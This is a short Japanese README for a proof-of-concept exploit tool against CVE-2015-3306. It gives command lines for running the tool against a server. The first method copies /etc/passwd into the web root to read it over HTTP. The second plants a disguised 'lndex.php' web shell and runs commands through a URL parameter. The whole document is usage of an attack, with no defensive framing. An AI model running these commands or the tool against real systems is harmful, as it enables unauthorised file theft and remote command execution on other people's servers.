
CVE-2015-3306 のエクスプロイトツール
Daniel AldanaによるCVE-2015-3306悪用のためのPoC。脆弱性はVadim Melihowによって報告されました。
###方法1:
使用方法:
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_SRC_FILE> <REMOTE_ABSOLUTEPATH_DST_FILE>
例:
python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt
次に試してください:
http://127.0.0.1/pass.txt
###方法2:
使用方法:
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_WEBDIR>
例:
python cpx_proftp.py 127.0.0.1 /var/www/html
次に試してください:
http://127.0.0.1/lndex.php?img=ls